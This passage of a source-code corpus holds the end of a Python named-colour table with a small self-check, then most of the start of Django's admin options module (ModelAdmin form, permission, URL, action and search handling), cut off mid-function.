"DARKGRAY": Color(169, 169, 169),
"DARKGREEN": Color(0, 100, 0),
"DARKGREY": Color(169, 169, 169),
"DARKKHAKI": Color(189, 183, 107),
"DARKMAGENTA": Color(139, 0, 139),
"DARKOLIVEGREEN": Color(85, 107, 47),
"DARKORANGE": Color(255, 140, 0),
"DARKORCHID": Color(153, 50, 204),
"DARKRED": Color(139, 0, 0),
"DARKSALMON": Color(233, 150, 122),
"DARKSEAGREEN": Color(143, 188, 143),
"DARKSLATEBLUE": Color(72, 61, 139),
"DARKSLATEGRAY": Color(47, 79, 79),
"DARKSLATEGREY": Color(47, 79, 79),
"DARKTURQUOISE": Color(0, 206, 209),
"DARKVIOLET": Color(148, 0, 211),
"DEEPPINK": Color(255, 20, 147),
"DEEPSKYBLUE": Color(0, 191, 255),
"DIMGRAY": Color(105, 105, 105),
"DIMGREY": Color(105, 105, 105),
"DODGERBLUE": Color(30, 144, 255),
"FIREBRICK": Color(178, 34, 34),
"FLORALWHITE": Color(255, 250, 240),
"FORESTGREEN": Color(34, 139, 34),
"FUCHSIA": Color(255, 0, 255),
"GAINSBORO": Color(220, 220, 220),
"GHOSTWHITE": Color(248, 248, 255),
"GOLD": Color(255, 215, 0),
"GOLDENROD": Color(218, 165, 32),
"GRAY": Color(128, 128, 128),
"GREY": Color(128, 128, 128),
"GREEN": Color(0, 128, 0),
"GREENYELLOW": Color(173, 255, 47),
"HONEYDEW": Color(240, 255, 240),
"HOTPINK": Color(255, 105, 180),
"INDIANRED": Color(205, 92, 92),
"INDIGO": Color(75, 0, 130),
"IVORY": Color(255, 255, 240),
"KHAKI": Color(240, 230, 140),
"LAVENDER": Color(230, 230, 250),
"LAVENDERBLUSH": Color(255, 240, 245),
"LAWNGREEN": Color(124, 252, 0),
"LEMONCHIFFON": Color(255, 250, 205),
"LIGHTBLUE": Color(173, 216, 230),
"LIGHTCORAL": Color(240, 128, 128),
"LIGHTCYAN": Color(224, 255, 255),
"LIGHTGOLDENRODYELLOW": Color(250, 250, 210),
"LIGHTGRAY": Color(211, 211, 211),
"LIGHTGREEN": Color(144, 238, 144),
"LIGHTGREY": Color(211, 211, 211),
"LIGHTPINK": Color(255, 182, 193),
"LIGHTSALMON": Color(255, 160, 122),
"LIGHTSEAGREEN": Color(32, 178, 170),
"LIGHTSKYBLUE": Color(135, 206, 250),
"LIGHTSLATEGRAY": Color(119, 136, 153),
"LIGHTSLATEGREY": Color(119, 136, 153),
"LIGHTSTEELBLUE": Color(176, 196, 222),
"LIGHTYELLOW": Color(255, 255, 224),
"LIME": Color(0, 255, 0),
"LIMEGREEN": Color(50, 205, 50),
"LINEN": Color(250, 240, 230),
"MAGENTA": Color(255, 0, 255),
"MAROON": Color(128, 0, 0),
"MEDIUMAQUAMARINE": Color(102, 205, 170),
"MEDIUMBLUE": Color(0, 0, 205),
"MEDIUMORCHID": Color(186, 85, 211),
"MEDIUMPURPLE": Color(147, 112, 219),
"MEDIUMSEAGREEN": Color(60, 179, 113),
"MEDIUMSLATEBLUE": Color(123, 104, 238),
"MEDIUMSPRINGGREEN": Color(0, 250, 154),
"MEDIUMTURQUOISE": Color(72, 209, 204),
"MEDIUMVIOLETRED": Color(199, 21, 133),
"MIDNIGHTBLUE": Color(25, 25, 112),
"MINTCREAM": Color(245, 255, 250),
"MISTYROSE": Color(255, 228, 225),
"MOCCASIN": Color(255, 228, 181),
"NAVAJOWHITE": Color(255, 222, 173),
"NAVY": Color(0, 0, 128),
"OLDLACE": Color(253, 245, 230),
"OLIVE": Color(128, 128, 0),
"OLIVEDRAB": Color(107, 142, 35),
"ORANGE": Color(255, 165, 0),
"ORANGERED": Color(255, 69, 0),
"ORCHID": Color(218, 112, 214),
"PALEGOLDENROD": Color(238, 232, 170),
"PALEGREEN": Color(152, 251, 152),
"PALETURQUOISE": Color(175, 238, 238),
"PALEVIOLETRED": Color(219, 112, 147),
"PAPAYAWHIP": Color(255, 239, 213),
"PEACHPUFF": Color(255, 218, 185),
"PERU": Color(205, 133, 63),
"PINK": Color(255, 192, 203),
"PLUM": Color(221, 160, 221),
"POWDERBLUE": Color(176, 224, 230),
"PURPLE": Color(128, 0, 128),
"RED": Color(255, 0, 0),
"ROSYBROWN": Color(188, 143, 143),
"ROYALBLUE": Color(65, 105, 225),
"SADDLEBROWN": Color(139, 69, 19),
"SALMON": Color(250, 128, 114),
"SANDYBROWN": Color(244, 164, 96),
"SEAGREEN": Color(46, 139, 87),
"SEASHELL": Color(255, 245, 238),
"SIENNA": Color(160, 82, 45),
"SILVER": Color(192, 192, 192),
"SKYBLUE": Color(135, 206, 235),
"SLATEBLUE": Color(106, 90, 205),
"SLATEGRAY": Color(112, 128, 144),
"SLATEGREY": Color(112, 128, 144),
"SNOW": Color(255, 250, 250),
"SPRINGGREEN": Color(0, 255, 127),
"STEELBLUE": Color(70, 130, 180),
"TAN": Color(210, 180, 140),
"TEAL": Color(0, 128, 128),
"THISTLE": Color(216, 191, 216),
"TOMATO": Color(255, 99, 71),
"TURQUOISE": Color(64, 224, 208),
"VIOLET": Color(238, 130, 238),
"WHEAT": Color(245, 222, 179),
"WHITE": Color(255, 255, 255),
"WHITESMOKE": Color(245, 245, 245),
"YELLOW": Color(255, 255, 0),
"YELLOWGREEN": Color(154, 205, 50)
}
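if __name__ == "__main__":
    # Informal self-check, not part of Selenium: __eq__ compares the rgba
    # string, so one colour compares equal across notations (assumes the
    # 0-255 scaling in _from_hsl above).
    assert Color.from_string('hsl(120, 100%, 50%)') == Color.from_string('rgb(0, 255, 0)')
    assert Color.from_string('#F00') == Colors['RED']
    print(Color.from_string('rgba(255, 0, 0, 0.5)'))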
| apache-2.0 |
sertac/django | django/contrib/admin/options.py | 126 | 81190 | import copy
import operator
from collections import OrderedDict
from functools import partial, reduce, update_wrapper
from django import forms
from django.conf import settings
from django.contrib import messages
from django.contrib.admin import helpers, widgets
from django.contrib.admin.checks import (
BaseModelAdminChecks, InlineModelAdminChecks, ModelAdminChecks,
)
from django.contrib.admin.exceptions import DisallowedModelAdminToField
from django.contrib.admin.templatetags.admin_static import static
from django.contrib.admin.templatetags.admin_urls import add_preserved_filters
from django.contrib.admin.utils import (
NestedObjects, flatten_fieldsets, get_deleted_objects,
lookup_needs_distinct, model_format_dict, quote, unquote,
)
from django.contrib.auth import get_permission_codename
from django.core.exceptions import (
FieldDoesNotExist, FieldError, PermissionDenied, ValidationError,
)
from django.core.paginator import Paginator
from django.core.urlresolvers import reverse
from django.db import models, router, transaction
from django.db.models.constants import LOOKUP_SEP
from django.db.models.fields import BLANK_CHOICE_DASH
from django.forms.formsets import DELETION_FIELD_NAME, all_valid
from django.forms.models import (
BaseInlineFormSet, inlineformset_factory, modelform_defines_fields,
modelform_factory, modelformset_factory,
)
from django.forms.widgets import CheckboxSelectMultiple, SelectMultiple
from django.http import Http404, HttpResponseRedirect
from django.http.response import HttpResponseBase
from django.template.response import SimpleTemplateResponse, TemplateResponse
from django.utils import six
from django.utils.decorators import method_decorator
from django.utils.encoding import force_text, python_2_unicode_compatible
from django.utils.html import escape, escapejs
from django.utils.http import urlencode
from django.utils.safestring import mark_safe
from django.utils.text import capfirst, get_text_list
from django.utils.translation import string_concat, ugettext as _, ungettext
from django.views.decorators.csrf import csrf_protect
from django.views.generic import RedirectView
IS_POPUP_VAR = '_popup'
TO_FIELD_VAR = '_to_field'
HORIZONTAL, VERTICAL = 1, 2
def get_content_type_for_model(obj):
# Since this module gets imported in the application's root package,
# it cannot import models from other applications at the module level.
from django.contrib.contenttypes.models import ContentType
return ContentType.objects.get_for_model(obj, for_concrete_model=False)
def get_ul_class(radio_style):
return 'radiolist' if radio_style == VERTICAL else 'radiolist inline'
class IncorrectLookupParameters(Exception):
pass
# Defaults for formfield_overrides. ModelAdmin subclasses can change this
# by adding to ModelAdmin.formfield_overrides.
FORMFIELD_FOR_DBFIELD_DEFAULTS = {
models.DateTimeField: {
'form_class': forms.SplitDateTimeField,
'widget': widgets.AdminSplitDateTime
},
models.DateField: {'widget': widgets.AdminDateWidget},
models.TimeField: {'widget': widgets.AdminTimeWidget},
models.TextField: {'widget': widgets.AdminTextareaWidget},
models.URLField: {'widget': widgets.AdminURLFieldWidget},
models.IntegerField: {'widget': widgets.AdminIntegerFieldWidget},
models.BigIntegerField: {'widget': widgets.AdminBigIntegerFieldWidget},
models.CharField: {'widget': widgets.AdminTextInputWidget},
models.ImageField: {'widget': widgets.AdminFileWidget},
models.FileField: {'widget': widgets.AdminFileWidget},
models.EmailField: {'widget': widgets.AdminEmailInputWidget},
}
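# A hedged sketch of how a project-level admin would extend these defaults;
# ``RichTextWidget`` is a hypothetical third-party widget:
#
#     class ArticleAdmin(admin.ModelAdmin):
#         formfield_overrides = {
#             models.TextField: {'widget': RichTextWidget},
#         }
#
# BaseModelAdmin.__init__ below merges such per-admin overrides on top of
# this module-level dict.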
csrf_protect_m = method_decorator(csrf_protect)
class BaseModelAdmin(six.with_metaclass(forms.MediaDefiningClass)):
"""Functionality common to both ModelAdmin and InlineAdmin."""
raw_id_fields = ()
fields = None
exclude = None
fieldsets = None
form = forms.ModelForm
filter_vertical = ()
filter_horizontal = ()
radio_fields = {}
prepopulated_fields = {}
formfield_overrides = {}
readonly_fields = ()
ordering = None
view_on_site = True
show_full_result_count = True
checks_class = BaseModelAdminChecks
@classmethod
def check(cls, model, **kwargs):
return cls.checks_class().check(cls, model, **kwargs)
def __init__(self):
overrides = FORMFIELD_FOR_DBFIELD_DEFAULTS.copy()
overrides.update(self.formfield_overrides)
self.formfield_overrides = overrides
def formfield_for_dbfield(self, db_field, **kwargs):
"""
Hook for specifying the form Field instance for a given database Field
instance.
If kwargs are given, they're passed to the form Field's constructor.
"""
request = kwargs.pop("request", None)
# If the field specifies choices, we don't need to look for special
# admin widgets - we just need to use a select widget of some kind.
if db_field.choices:
return self.formfield_for_choice_field(db_field, request, **kwargs)
# ForeignKey or ManyToManyFields
if isinstance(db_field, (models.ForeignKey, models.ManyToManyField)):
# Combine the field kwargs with any options for formfield_overrides.
# Make sure the passed in **kwargs override anything in
# formfield_overrides because **kwargs is more specific, and should
# always win.
if db_field.__class__ in self.formfield_overrides:
kwargs = dict(self.formfield_overrides[db_field.__class__], **kwargs)
# Get the correct formfield.
if isinstance(db_field, models.ForeignKey):
formfield = self.formfield_for_foreignkey(db_field, request, **kwargs)
elif isinstance(db_field, models.ManyToManyField):
formfield = self.formfield_for_manytomany(db_field, request, **kwargs)
# For non-raw_id fields, wrap the widget with a wrapper that adds
# extra HTML -- the "add other" interface -- to the end of the
# rendered output. formfield can be None if it came from a
# OneToOneField with parent_link=True or a M2M intermediary.
if formfield and db_field.name not in self.raw_id_fields:
related_modeladmin = self.admin_site._registry.get(db_field.remote_field.model)
wrapper_kwargs = {}
if related_modeladmin:
wrapper_kwargs.update(
can_add_related=related_modeladmin.has_add_permission(request),
can_change_related=related_modeladmin.has_change_permission(request),
can_delete_related=related_modeladmin.has_delete_permission(request),
)
formfield.widget = widgets.RelatedFieldWidgetWrapper(
formfield.widget, db_field.remote_field, self.admin_site, **wrapper_kwargs
)
return formfield
# If we've got overrides for the formfield defined, use 'em. **kwargs
# passed to formfield_for_dbfield override the defaults.
for klass in db_field.__class__.mro():
if klass in self.formfield_overrides:
kwargs = dict(copy.deepcopy(self.formfield_overrides[klass]), **kwargs)
return db_field.formfield(**kwargs)
# For any other type of field, just call its formfield() method.
return db_field.formfield(**kwargs)
def formfield_for_choice_field(self, db_field, request=None, **kwargs):
"""
Get a form Field for a database Field that has declared choices.
"""
# If the field is named as a radio_field, use a RadioSelect
if db_field.name in self.radio_fields:
# Avoid stomping on custom widget/choices arguments.
if 'widget' not in kwargs:
kwargs['widget'] = widgets.AdminRadioSelect(attrs={
'class': get_ul_class(self.radio_fields[db_field.name]),
})
if 'choices' not in kwargs:
kwargs['choices'] = db_field.get_choices(
include_blank=db_field.blank,
blank_choice=[('', _('None'))]
)
return db_field.formfield(**kwargs)
def get_field_queryset(self, db, db_field, request):
"""
If the ModelAdmin specifies ordering, the queryset should respect that
        ordering. Otherwise don't specify the queryset; let the field decide
(returns None in that case).
"""
related_admin = self.admin_site._registry.get(db_field.remote_field.model)
if related_admin is not None:
ordering = related_admin.get_ordering(request)
if ordering is not None and ordering != ():
return db_field.remote_field.model._default_manager.using(db).order_by(*ordering)
return None
def formfield_for_foreignkey(self, db_field, request=None, **kwargs):
"""
Get a form Field for a ForeignKey.
"""
db = kwargs.get('using')
if db_field.name in self.raw_id_fields:
kwargs['widget'] = widgets.ForeignKeyRawIdWidget(db_field.remote_field,
self.admin_site, using=db)
elif db_field.name in self.radio_fields:
kwargs['widget'] = widgets.AdminRadioSelect(attrs={
'class': get_ul_class(self.radio_fields[db_field.name]),
})
kwargs['empty_label'] = _('None') if db_field.blank else None
if 'queryset' not in kwargs:
queryset = self.get_field_queryset(db, db_field, request)
if queryset is not None:
kwargs['queryset'] = queryset
return db_field.formfield(**kwargs)
def formfield_for_manytomany(self, db_field, request=None, **kwargs):
"""
Get a form Field for a ManyToManyField.
"""
# If it uses an intermediary model that isn't auto created, don't show
# a field in admin.
if not db_field.remote_field.through._meta.auto_created:
return None
db = kwargs.get('using')
if db_field.name in self.raw_id_fields:
kwargs['widget'] = widgets.ManyToManyRawIdWidget(db_field.remote_field,
self.admin_site, using=db)
kwargs['help_text'] = ''
elif db_field.name in (list(self.filter_vertical) + list(self.filter_horizontal)):
kwargs['widget'] = widgets.FilteredSelectMultiple(
db_field.verbose_name,
db_field.name in self.filter_vertical
)
if 'queryset' not in kwargs:
queryset = self.get_field_queryset(db, db_field, request)
if queryset is not None:
kwargs['queryset'] = queryset
form_field = db_field.formfield(**kwargs)
if isinstance(form_field.widget, SelectMultiple) and not isinstance(form_field.widget, CheckboxSelectMultiple):
msg = _('Hold down "Control", or "Command" on a Mac, to select more than one.')
help_text = form_field.help_text
form_field.help_text = string_concat(help_text, ' ', msg) if help_text else msg
return form_field
def get_view_on_site_url(self, obj=None):
if obj is None or not self.view_on_site:
return None
if callable(self.view_on_site):
return self.view_on_site(obj)
elif self.view_on_site and hasattr(obj, 'get_absolute_url'):
# use the ContentType lookup if view_on_site is True
return reverse('admin:view_on_site', kwargs={
'content_type_id': get_content_type_for_model(obj).pk,
'object_id': obj.pk
})
def get_empty_value_display(self):
"""
Return the empty_value_display set on ModelAdmin or AdminSite.
"""
try:
return mark_safe(self.empty_value_display)
except AttributeError:
return mark_safe(self.admin_site.empty_value_display)
def get_fields(self, request, obj=None):
"""
Hook for specifying fields.
"""
return self.fields
def get_fieldsets(self, request, obj=None):
"""
Hook for specifying fieldsets.
"""
if self.fieldsets:
return self.fieldsets
return [(None, {'fields': self.get_fields(request, obj)})]
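    # For reference, a hedged example of the structure get_fieldsets()
    # returns; the field names are hypothetical:
    #
    #     [
    #         (None, {'fields': ('title', 'body')}),
    #         ('Advanced options', {
    #             'classes': ('collapse',),
    #             'fields': ('slug', 'publish_date'),
    #         }),
    #     ]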
def get_ordering(self, request):
"""
Hook for specifying field ordering.
"""
return self.ordering or () # otherwise we might try to *None, which is bad ;)
def get_readonly_fields(self, request, obj=None):
"""
Hook for specifying custom readonly fields.
"""
return self.readonly_fields
def get_prepopulated_fields(self, request, obj=None):
"""
Hook for specifying custom prepopulated fields.
"""
return self.prepopulated_fields
def get_queryset(self, request):
"""
Returns a QuerySet of all model instances that can be edited by the
admin site. This is used by changelist_view.
"""
qs = self.model._default_manager.get_queryset()
# TODO: this should be handled by some parameter to the ChangeList.
ordering = self.get_ordering(request)
if ordering:
qs = qs.order_by(*ordering)
return qs
def lookup_allowed(self, lookup, value):
from django.contrib.admin.filters import SimpleListFilter
model = self.model
# Check FKey lookups that are allowed, so that popups produced by
# ForeignKeyRawIdWidget, on the basis of ForeignKey.limit_choices_to,
# are allowed to work.
for l in model._meta.related_fkey_lookups:
# As ``limit_choices_to`` can be a callable, invoke it here.
if callable(l):
l = l()
for k, v in widgets.url_params_from_lookup_dict(l).items():
if k == lookup and v == value:
return True
relation_parts = []
prev_field = None
for part in lookup.split(LOOKUP_SEP):
try:
field = model._meta.get_field(part)
except FieldDoesNotExist:
# Lookups on non-existent fields are ok, since they're ignored
# later.
break
            # It is allowed to filter on values that would be found from the
            # local model anyway. For example, if you filter on employee__department__id,
# then the id value would be found already from employee__department_id.
if not prev_field or (prev_field.concrete and
field not in prev_field.get_path_info()[-1].target_fields):
relation_parts.append(part)
if not getattr(field, 'get_path_info', None):
# This is not a relational field, so further parts
# must be transforms.
break
prev_field = field
model = field.get_path_info()[-1].to_opts.model
if len(relation_parts) <= 1:
# Either a local field filter, or no fields at all.
return True
clean_lookup = LOOKUP_SEP.join(relation_parts)
valid_lookups = [self.date_hierarchy]
for filter_item in self.list_filter:
if isinstance(filter_item, type) and issubclass(filter_item, SimpleListFilter):
valid_lookups.append(filter_item.parameter_name)
elif isinstance(filter_item, (list, tuple)):
valid_lookups.append(filter_item[0])
else:
valid_lookups.append(filter_item)
return clean_lookup in valid_lookups
def to_field_allowed(self, request, to_field):
"""
Returns True if the model associated with this admin should be
allowed to be referenced by the specified field.
"""
opts = self.model._meta
try:
field = opts.get_field(to_field)
except FieldDoesNotExist:
return False
# Always allow referencing the primary key since it's already possible
# to get this information from the change view URL.
if field.primary_key:
return True
# Allow reverse relationships to models defining m2m fields if they
# target the specified field.
for many_to_many in opts.many_to_many:
if many_to_many.m2m_target_field_name() == to_field:
return True
# Make sure at least one of the models registered for this site
# references this field through a FK or a M2M relationship.
registered_models = set()
for model, admin in self.admin_site._registry.items():
registered_models.add(model)
for inline in admin.inlines:
registered_models.add(inline.model)
related_objects = (
f for f in opts.get_fields(include_hidden=True)
if (f.auto_created and not f.concrete)
)
for related_object in related_objects:
related_model = related_object.related_model
if (any(issubclass(model, related_model) for model in registered_models) and
related_object.field.remote_field.get_related_field() == field):
return True
return False
def has_add_permission(self, request):
"""
Returns True if the given request has permission to add an object.
Can be overridden by the user in subclasses.
"""
opts = self.opts
codename = get_permission_codename('add', opts)
return request.user.has_perm("%s.%s" % (opts.app_label, codename))
def has_change_permission(self, request, obj=None):
"""
        Returns True if the given request has permission to change the given
        Django model instance; the default implementation doesn't examine the
`obj` parameter.
Can be overridden by the user in subclasses. In such case it should
return True if the given request has permission to change the `obj`
model instance. If `obj` is None, this should return True if the given
request has permission to change *any* object of the given type.
"""
opts = self.opts
codename = get_permission_codename('change', opts)
return request.user.has_perm("%s.%s" % (opts.app_label, codename))
def has_delete_permission(self, request, obj=None):
"""
        Returns True if the given request has permission to delete the given
        Django model instance; the default implementation doesn't examine the
`obj` parameter.
Can be overridden by the user in subclasses. In such case it should
return True if the given request has permission to delete the `obj`
model instance. If `obj` is None, this should return True if the given
request has permission to delete *any* object of the given type.
"""
opts = self.opts
codename = get_permission_codename('delete', opts)
return request.user.has_perm("%s.%s" % (opts.app_label, codename))
def has_module_permission(self, request):
"""
Returns True if the given request has any permission in the given
app label.
Can be overridden by the user in subclasses. In such case it should
return True if the given request has permission to view the module on
the admin index page and access the module's index page. Overriding it
does not restrict access to the add, change or delete views. Use
`ModelAdmin.has_(add|change|delete)_permission` for that.
"""
return request.user.has_module_perms(self.opts.app_label)
@python_2_unicode_compatible
class ModelAdmin(BaseModelAdmin):
"Encapsulates all admin options and functionality for a given model."
list_display = ('__str__',)
list_display_links = ()
list_filter = ()
list_select_related = False
list_per_page = 100
list_max_show_all = 200
list_editable = ()
search_fields = ()
date_hierarchy = None
save_as = False
save_on_top = False
paginator = Paginator
preserve_filters = True
inlines = []
    # Custom templates (designed to be overridden in subclasses)
add_form_template = None
change_form_template = None
change_list_template = None
delete_confirmation_template = None
delete_selected_confirmation_template = None
object_history_template = None
# Actions
actions = []
action_form = helpers.ActionForm
actions_on_top = True
actions_on_bottom = False
actions_selection_counter = True
checks_class = ModelAdminChecks
def __init__(self, model, admin_site):
self.model = model
self.opts = model._meta
self.admin_site = admin_site
super(ModelAdmin, self).__init__()
def __str__(self):
return "%s.%s" % (self.model._meta.app_label, self.__class__.__name__)
def get_inline_instances(self, request, obj=None):
inline_instances = []
for inline_class in self.inlines:
inline = inline_class(self.model, self.admin_site)
if request:
if not (inline.has_add_permission(request) or
inline.has_change_permission(request, obj) or
inline.has_delete_permission(request, obj)):
continue
if not inline.has_add_permission(request):
inline.max_num = 0
inline_instances.append(inline)
return inline_instances
def get_urls(self):
from django.conf.urls import url
def wrap(view):
def wrapper(*args, **kwargs):
return self.admin_site.admin_view(view)(*args, **kwargs)
wrapper.model_admin = self
return update_wrapper(wrapper, view)
info = self.model._meta.app_label, self.model._meta.model_name
urlpatterns = [
url(r'^$', wrap(self.changelist_view), name='%s_%s_changelist' % info),
url(r'^add/$', wrap(self.add_view), name='%s_%s_add' % info),
url(r'^(.+)/history/$', wrap(self.history_view), name='%s_%s_history' % info),
url(r'^(.+)/delete/$', wrap(self.delete_view), name='%s_%s_delete' % info),
url(r'^(.+)/change/$', wrap(self.change_view), name='%s_%s_change' % info),
# For backwards compatibility (was the change url before 1.9)
url(r'^(.+)/$', wrap(RedirectView.as_view(
pattern_name='%s:%s_%s_change' % ((self.admin_site.name,) + info)
))),
]
return urlpatterns
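    # A sketch of the usual pattern for adding a custom view in a subclass;
    # the view name and URL are illustrative. Extra patterns go first so the
    # catch-all redirect above does not shadow them:
    #
    #     def get_urls(self):
    #         from django.conf.urls import url
    #         extra = [
    #             url(r'^report/$',
    #                 self.admin_site.admin_view(self.report_view),
    #                 name='myapp_article_report'),
    #         ]
    #         return extra + super(ArticleAdmin, self).get_urls()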
def urls(self):
return self.get_urls()
urls = property(urls)
@property
def media(self):
extra = '' if settings.DEBUG else '.min'
js = [
'core.js',
'admin/RelatedObjectLookups.js',
'vendor/jquery/jquery%s.js' % extra,
'jquery.init.js',
'actions%s.js' % extra,
'urlify.js',
'prepopulate%s.js' % extra,
'vendor/xregexp/xregexp.min.js',
]
return forms.Media(js=[static('admin/js/%s' % url) for url in js])
def get_model_perms(self, request):
"""
Returns a dict of all perms for this model. This dict has the keys
``add``, ``change``, and ``delete`` mapping to the True/False for each
of those actions.
"""
return {
'add': self.has_add_permission(request),
'change': self.has_change_permission(request),
'delete': self.has_delete_permission(request),
}
def get_fields(self, request, obj=None):
if self.fields:
return self.fields
form = self.get_form(request, obj, fields=None)
return list(form.base_fields) + list(self.get_readonly_fields(request, obj))
def get_form(self, request, obj=None, **kwargs):
"""
Returns a Form class for use in the admin add view. This is used by
add_view and change_view.
"""
if 'fields' in kwargs:
fields = kwargs.pop('fields')
else:
fields = flatten_fieldsets(self.get_fieldsets(request, obj))
if self.exclude is None:
exclude = []
else:
exclude = list(self.exclude)
readonly_fields = self.get_readonly_fields(request, obj)
exclude.extend(readonly_fields)
if self.exclude is None and hasattr(self.form, '_meta') and self.form._meta.exclude:
# Take the custom ModelForm's Meta.exclude into account only if the
# ModelAdmin doesn't define its own.
exclude.extend(self.form._meta.exclude)
# if exclude is an empty list we pass None to be consistent with the
# default on modelform_factory
exclude = exclude or None
# Remove declared form fields which are in readonly_fields.
new_attrs = OrderedDict(
(f, None) for f in readonly_fields
if f in self.form.declared_fields
)
form = type(self.form.__name__, (self.form,), new_attrs)
defaults = {
"form": form,
"fields": fields,
"exclude": exclude,
"formfield_callback": partial(self.formfield_for_dbfield, request=request),
}
defaults.update(kwargs)
if defaults['fields'] is None and not modelform_defines_fields(defaults['form']):
defaults['fields'] = forms.ALL_FIELDS
try:
return modelform_factory(self.model, **defaults)
except FieldError as e:
raise FieldError('%s. Check fields/fieldsets/exclude attributes of class %s.'
% (e, self.__class__.__name__))
def get_changelist(self, request, **kwargs):
"""
Returns the ChangeList class for use on the changelist page.
"""
from django.contrib.admin.views.main import ChangeList
return ChangeList
def get_object(self, request, object_id, from_field=None):
"""
        Returns an instance matching the field and value provided; the primary
key is used if no field is provided. Returns ``None`` if no match is
found or the object_id fails validation.
"""
queryset = self.get_queryset(request)
model = queryset.model
field = model._meta.pk if from_field is None else model._meta.get_field(from_field)
try:
object_id = field.to_python(object_id)
return queryset.get(**{field.name: object_id})
except (model.DoesNotExist, ValidationError, ValueError):
return None
def get_changelist_form(self, request, **kwargs):
"""
Returns a Form class for use in the Formset on the changelist page.
"""
defaults = {
"formfield_callback": partial(self.formfield_for_dbfield, request=request),
}
defaults.update(kwargs)
if (defaults.get('fields') is None
and not modelform_defines_fields(defaults.get('form'))):
defaults['fields'] = forms.ALL_FIELDS
return modelform_factory(self.model, **defaults)
def get_changelist_formset(self, request, **kwargs):
"""
Returns a FormSet class for use on the changelist page if list_editable
is used.
"""
defaults = {
"formfield_callback": partial(self.formfield_for_dbfield, request=request),
}
defaults.update(kwargs)
return modelformset_factory(self.model,
self.get_changelist_form(request), extra=0,
fields=self.list_editable, **defaults)
def get_formsets_with_inlines(self, request, obj=None):
"""
Yields formsets and the corresponding inlines.
"""
for inline in self.get_inline_instances(request, obj):
yield inline.get_formset(request, obj), inline
def get_paginator(self, request, queryset, per_page, orphans=0, allow_empty_first_page=True):
return self.paginator(queryset, per_page, orphans, allow_empty_first_page)
def log_addition(self, request, object, message):
"""
Log that an object has been successfully added.
The default implementation creates an admin LogEntry object.
"""
from django.contrib.admin.models import LogEntry, ADDITION
LogEntry.objects.log_action(
user_id=request.user.pk,
content_type_id=get_content_type_for_model(object).pk,
object_id=object.pk,
object_repr=force_text(object),
action_flag=ADDITION,
change_message=message,
)
def log_change(self, request, object, message):
"""
Log that an object has been successfully changed.
The default implementation creates an admin LogEntry object.
"""
from django.contrib.admin.models import LogEntry, CHANGE
LogEntry.objects.log_action(
user_id=request.user.pk,
content_type_id=get_content_type_for_model(object).pk,
object_id=object.pk,
object_repr=force_text(object),
action_flag=CHANGE,
change_message=message,
)
def log_deletion(self, request, object, object_repr):
"""
Log that an object will be deleted. Note that this method must be
called before the deletion.
The default implementation creates an admin LogEntry object.
"""
from django.contrib.admin.models import LogEntry, DELETION
LogEntry.objects.log_action(
user_id=request.user.pk,
content_type_id=get_content_type_for_model(object).pk,
object_id=object.pk,
object_repr=object_repr,
action_flag=DELETION,
)
def action_checkbox(self, obj):
"""
A list_display column containing a checkbox widget.
"""
return helpers.checkbox.render(helpers.ACTION_CHECKBOX_NAME, force_text(obj.pk))
action_checkbox.short_description = mark_safe('<input type="checkbox" id="action-toggle" />')
action_checkbox.allow_tags = True
def get_actions(self, request):
"""
Return a dictionary mapping the names of all actions for this
ModelAdmin to a tuple of (callable, name, description) for each action.
"""
# If self.actions is explicitly set to None that means that we don't
# want *any* actions enabled on this page.
if self.actions is None or IS_POPUP_VAR in request.GET:
return OrderedDict()
actions = []
# Gather actions from the admin site first
for (name, func) in self.admin_site.actions:
description = getattr(func, 'short_description', name.replace('_', ' '))
actions.append((func, name, description))
# Then gather them from the model admin and all parent classes,
# starting with self and working back up.
for klass in self.__class__.mro()[::-1]:
class_actions = getattr(klass, 'actions', [])
# Avoid trying to iterate over None
if not class_actions:
continue
actions.extend(self.get_action(action) for action in class_actions)
# get_action might have returned None, so filter any of those out.
actions = filter(None, actions)
# Convert the actions into an OrderedDict keyed by name.
actions = OrderedDict(
(name, (func, name, desc))
for func, name, desc in actions
)
return actions
def get_action_choices(self, request, default_choices=BLANK_CHOICE_DASH):
"""
Return a list of choices for use in a form object. Each choice is a
tuple (name, description).
"""
choices = [] + default_choices
for func, name, description in six.itervalues(self.get_actions(request)):
choice = (name, description % model_format_dict(self.opts))
choices.append(choice)
return choices
def get_action(self, action):
"""
Return a given action from a parameter, which can either be a callable,
        or the name of a method on the ModelAdmin. The return value is a tuple
        of (callable, name, description).
"""
# If the action is a callable, just use it.
if callable(action):
func = action
action = action.__name__
# Next, look for a method. Grab it off self.__class__ to get an unbound
# method instead of a bound one; this ensures that the calling
# conventions are the same for functions and methods.
elif hasattr(self.__class__, action):
func = getattr(self.__class__, action)
# Finally, look for a named method on the admin site
else:
try:
func = self.admin_site.get_action(action)
except KeyError:
return None
if hasattr(func, 'short_description'):
description = func.short_description
else:
description = capfirst(action.replace('_', ' '))
return func, action, description
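    # Illustrative only: an action is any callable accepting
    # (modeladmin, request, queryset), and get_action() above resolves
    # names to such callables. ``status`` is a hypothetical model field:
    #
    #     def make_published(modeladmin, request, queryset):
    #         queryset.update(status='published')
    #     make_published.short_description = "Mark selected as published"
    #
    #     class ArticleAdmin(admin.ModelAdmin):
    #         actions = [make_published]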
def get_list_display(self, request):
"""
Return a sequence containing the fields to be displayed on the
changelist.
"""
return self.list_display
def get_list_display_links(self, request, list_display):
"""
Return a sequence containing the fields to be displayed as links
on the changelist. The list_display parameter is the list of fields
returned by get_list_display().
"""
if self.list_display_links or self.list_display_links is None or not list_display:
return self.list_display_links
else:
# Use only the first item in list_display as link
return list(list_display)[:1]
def get_list_filter(self, request):
"""
Returns a sequence containing the fields to be displayed as filters in
the right sidebar of the changelist page.
"""
return self.list_filter
def get_list_select_related(self, request):
"""
Returns a list of fields to add to the select_related() part of the
changelist items query.
"""
return self.list_select_related
def get_search_fields(self, request):
"""
Returns a sequence containing the fields to be searched whenever
somebody submits a search query.
"""
return self.search_fields
def get_search_results(self, request, queryset, search_term):
"""
Returns a tuple containing a queryset to implement the search,
and a boolean indicating if the results may contain duplicates.
"""
# Apply keyword searches.
def construct_search(field_name):
if field_name.startswith('^'):
return "%s__istartswith" % field_name[1:]
elif field_name.startswith('='):
return "%s__iexact" % field_name[1:]
elif field_name.startswith('@'):
return "%s__search" % field_name[1:]
else:
return "%s__icontains" % field_name
use_distinct = False
search_fields = self.get_search_fields(request)
if search_fields and search_term:
orm_lookups = [construct_search(str(search_field))
for search_field in search_fields]
for bit in search_term.split():
or_queries = [models.Q(**{orm_lookup: bit})
for orm_lookup in orm_lookups]
